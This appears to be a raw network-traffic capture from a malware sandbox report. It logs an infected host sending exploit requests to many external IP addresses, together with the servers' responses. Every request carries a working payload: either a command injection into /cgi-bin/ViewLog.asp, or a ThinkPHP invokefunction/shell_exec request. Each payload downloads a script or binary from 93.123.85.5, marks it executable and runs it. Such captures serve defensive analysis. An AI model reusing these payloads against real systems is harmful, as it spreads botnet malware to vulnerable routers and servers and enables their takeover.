                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              271192.168.2.234616495.216.75.398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.409380913 CET6128OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:49.721757889 CET6168INHTTP/1.1 404 Not Found
                                                              Content-Type: text/plain; charset=utf-8
                                                              X-Content-Type-Options: nosniff
                                                              Date: Mon, 13 Nov 2023 21:18:49 GMT
                                                              Content-Length: 19
                                                              Connection: close
                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                              Data Ascii: 404 page not found


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              272192.168.2.235536031.136.93.1468080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.426565886 CET6128OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:50.414911032 CET6247OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:52.398813009 CET6498OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.590194941 CET6977OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.525230885 CET7954OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.394972086 CET9927OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.902853012 CET14019OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              273192.168.2.234861894.123.187.848080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.458962917 CET6129OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              274192.168.2.2346390112.203.112.11880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.554176092 CET6132OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:49.855891943 CET6229INHTTP/1.0 400 Bad Request
                                                              Connection: close
                                                              Content-Length: 113
                                                              Date: Mon, 13 Nov 2023 21:18:47 GMT
                                                              Expires: 0
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              275192.168.2.234716494.121.27.578080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.161160946 CET6357OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              276192.168.2.2338082112.175.189.11980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.161279917 CET6358OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:51.448131084 CET6364INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:16:51 GMT
                                                              Server: Apache
                                                              Content-Length: 207
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              277192.168.2.233481094.122.8.2498080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.166169882 CET6358OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              278192.168.2.2336446112.125.169.15580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.187212944 CET6360OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:51.499825001 CET6367INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:15:45 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              279192.168.2.2348296112.126.189.22880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.189402103 CET6361OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:51.504178047 CET6369INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:14:49 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              28192.168.2.235836231.185.154.2168080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:11.546159983 CET1535OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:11.914355040 CET1631INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:18:11 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              280192.168.2.233656494.228.183.388080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.470977068 CET6366OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:51.787877083 CET6420INHTTP/1.0 200 Ok
                                                              Server: httpd
                                                              Date: Mon, 13 Nov 2023 21:18:51 GMT
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Expires: 0
                                                              Content-Type: text/html
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              281192.168.2.233923085.122.220.888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.494060040 CET6366OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              282192.168.2.233979695.100.122.14780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.502465010 CET6368OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:51.817785978 CET6444INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:18:51 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:51 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 39 38 65 32 31 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 33 33 31 26 23 34 36 3b 38 62 66 31 64 39 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;398e2117&#46;1699910331&#46;8bf1d9e</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              283192.168.2.235817295.217.135.7480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:51.504225016 CET6369OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:51.821315050 CET6448INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
